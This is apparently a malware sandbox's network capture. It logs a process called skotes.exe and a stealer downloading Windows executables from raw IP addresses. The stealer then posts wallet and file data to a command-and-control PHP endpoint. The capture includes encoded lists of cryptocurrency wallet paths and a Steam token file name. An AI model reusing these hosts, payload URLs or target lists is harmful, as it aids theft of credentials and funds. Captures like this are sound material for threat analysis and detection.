Dec 14, 2024 12:57:04.663409948 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:04 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 14, 2024 12:57:05.972330093 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 12:57:07.087390900 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:06 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:57:07.261198997 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKECGDBFCBKFIDHIDHDH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 2d 2d 0d 0a Data Ascii: ------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------JKECGDBFCBKFIDHIDHDHContent-Disposition: form-data; name="message"wallets------JKECGDBFCBKFIDHIDHDH--
Dec 14, 2024 12:57:07.706182003 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:07 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Dec 14, 2024 12:57:07.708779097 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 46 42 41 45 42 4b 4b 45 42 46 49 4a 45 42 4b 2d 2d 0d 0a Data Ascii: ------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------EGIDAFBAEBKKEBFIJEBKContent-Disposition: form-data; name="message"files------EGIDAFBAEBKKEBFIJEBK--
Dec 14, 2024 12:57:08.160669088 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:07 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:57:08.183020115 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGI Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="file"------KJKJKFCBKKJDGDHIDBGI--
Dec 14, 2024 12:57:09.117469072 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 12:57:09.151611090 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCB Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 43 42 2d 2d 0d 0a Data Ascii: ------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------GDHDHJEBGHJKFIECBGCBContent-Disposition: form-data; name="message"ybncbhylepme------GDHDHJEBGHJKFIECBGCB--
Dec 14, 2024 12:57:09.596590042 CET	271	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 11:57:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49905	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:52.006088018 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015169001&unit=246122658369
Dec 14, 2024 12:56:53.353961945 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49909	34.107.221.82	80	8032	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:52.574528933 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:56:53.661477089 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:40:27 GMT Age: 76586 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 14, 2024 12:56:55.843745947 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 14, 2024 12:56:56.158866882 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Fri, 13 Dec 2024 14:40:27 GMT Age: 76589 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49913	31.41.244.11	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:53.479116917 CET	59	OUT	GET /files/fate/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 12:56:54.835777998 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:54 GMT Content-Type: application/octet-stream Content-Length: 727552 Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT Connection: keep-alive ETag: "67594bc0-b1a00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P\|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
Dec 14, 2024 12:56:54.835877895 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:54.835911036 CET	1236	IN	Data Raw: 89 c7 83 f8 0f 77 2c 90 89 7d c4 c7 45 c8 0f 00 00 00 57 ff 75 e0 8d 45 b4 50 e8 f4 36 00 00 83 c4 0c 01 ef 83 c7 b4 eb 77 66 2e 0f 1f 84 00 00 00 00 00 90 89 7d d8 83 cf 0f 83 ff 17 b9 16 00 00 00 0f 43 cf 81 ff ff 0f 00 00 c7 45 f0 01 00 00 00 Data Ascii: w,}EWuEP6wf.}CEMrA$PL#FfAP1u}}EEWuVx6E]5MMuEC]ry1tL1fDi[1i
Dec 14, 2024 12:56:54.835947037 CET	672	IN	Data Raw: 00 e8 39 01 00 00 8b 45 e0 83 c4 04 eb 22 90 89 4d dc ff 15 c4 cc 41 00 8b 4d e0 90 89 4d dc 50 68 2d 9f 41 00 e8 15 01 00 00 8b 45 e0 83 c4 08 90 89 45 dc ff 75 d4 e8 39 6f 00 00 8b 75 e0 83 c4 04 90 0f b6 84 35 c4 fe ff ff 8b 55 d0 00 c2 0f b6 Data Ascii: 9E"MAMMPh-AEEu9ou5U5U5MU0BU9UuUEd0^_[]fUeE@EMPhAWEMj
Dec 14, 2024 12:56:54.835983992 CET	1236	IN	Data Raw: 00 8b 40 18 a3 58 f0 41 00 68 62 2d a5 2f ff 35 58 f0 41 00 e8 d6 f7 ff ff 83 ec 14 0f 28 05 30 60 41 00 0f 11 44 24 04 89 1c 24 c7 44 24 18 00 00 00 00 c7 44 24 14 80 00 00 00 ff d0 83 f8 ff 0f 84 e4 02 00 00 89 c6 6a 00 50 ff 15 b8 cc 41 00 83 Data Ascii: @XAhb-/5XA(0`AD$$D$D$jPAP=EEjPW}WV0AVHAG<LMEEE1ffff.E(E@E;E"WEWEulH
Dec 14, 2024 12:56:54.836019039 CET	1236	IN	Data Raw: 90 ff 75 e0 e8 f8 67 00 00 83 c4 04 8b 45 e8 64 a3 00 00 00 00 83 c4 58 5e 5f 5b 5d c3 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 83 ec 10 83 c5 0c 90 ff 75 e0 e8 5a 06 00 00 83 c4 04 83 c4 10 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 Data Ascii: ugEdX^_[]fffff.UuZ]USWV(eEEE"@dMdjAhQPAjEEEj@@EMEMQjPh @jjQ
Dec 14, 2024 12:56:54.836056948 CET	1236	IN	Data Raw: bd 01 00 00 83 c4 04 8b 45 f4 64 a3 00 00 00 00 eb 0a 90 8b 45 f4 64 a3 00 00 00 00 83 c4 14 5d c3 66 0f 1f 44 00 00 55 50 83 c5 00 90 ff 75 ec e8 8c 01 00 00 83 c4 04 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 14 90 8b Data Ascii: EdEd]fDUPu]USWVUeEEE@#@dMdUEEu)Ed1^_[]UPM]fffff.UPu]
Dec 14, 2024 12:56:54.836091995 CET	104	IN	Data Raw: 00 00 83 c4 0c c6 04 1e 00 8b c7 5e eb 0f 53 ff 75 08 8b cf ff 75 fc 53 e8 93 04 00 00 5f 5b c9 c2 08 00 55 8b ec 8b 4d 08 83 c9 0f 56 3b 4d 10 77 1c 8b 75 0c 8b d6 8b 45 10 d1 ea 2b c2 3b f0 77 0c 8d 04 32 3b c8 0f 42 c8 8b c1 eb 03 8b 45 10 5e Data Ascii: ^SuuS_[UMV;MwuE+;w2;BE^]V~vF@P
Dec 14, 2024 12:56:54.836123943 CET	1236	IN	Data Raw: 36 e8 12 05 00 00 59 59 83 66 10 00 c7 46 14 0f 00 00 00 c6 06 00 5e c3 55 8b ec 51 8b 45 08 56 8b f1 89 75 fc 83 78 14 0f 76 02 8b 00 50 e8 a4 fc ff ff c7 06 b8 61 41 00 8b c6 5e c9 c2 04 00 55 8b ec 56 ff 75 08 8b f1 e8 be fc ff ff c7 06 b8 61 Data Ascii: 6YYfF^UQEVuxvPaA^UVuaA^]UVFD`APEYtjVYY^]UVu4\|aAP4aAMh,AEPDAUEUH]UQQVWuupEP
Dec 14, 2024 12:56:54.836159945 CET	1236	IN	Data Raw: f4 40 50 56 e8 3b 00 00 00 83 c4 20 eb 1b 53 51 e8 d2 1b 00 00 8b 75 14 56 ff 75 10 57 e8 c5 1b 00 00 83 c4 18 c6 04 37 00 8b 45 fc 8b cb 89 03 e8 cf f8 ff ff 5f 5e 8b c3 5b c9 c2 10 00 e8 b4 f4 ff ff cc 55 8b ec 8b 45 0c 3d 00 10 00 00 72 12 8d Data Ascii: @PV; SQuVuW7E_^[UE=rEPEPEYYPuJYY]UEu]P=rY]UEH#;QYtA#H]SaaAALaAUMu*h AEP
Dec 14, 2024 12:56:54.956521034 CET	1236	IN	Data Raw: 00 59 59 5d c3 55 8b ec 51 8b 4d 08 83 69 2c 01 75 0e 83 49 28 ff 8d 41 08 50 ff 15 34 cd 41 00 33 c0 c9 c3 55 8b ec 83 ec 18 a1 00 e6 41 00 33 c5 89 45 fc 56 8b 75 08 ff 15 ac cc 41 00 8b 0e 81 e1 ff fe ff ff 89 45 e8 83 f9 01 75 1f 39 46 28 74 Data Ascii: YY]UQMi,uI(AP4A3UA3EVuAEu9F(tFPDAEF(F,3SW}u^(9FPDAt\|WrQOu9O~GEPYM;O\|9Er9EuY;OuTE;G}LE^(9t%FPdAu^(9t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49925	34.107.221.82	80	8032	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:56.090755939 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49929	34.107.221.82	80	8032	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:57.220305920 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 14, 2024 12:56:58.310492039 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 13 Dec 2024 14:32:27 GMT Age: 77071 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49936	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:58.824636936 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015170001&unit=246122658369
Dec 14, 2024 12:57:00.172833920 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
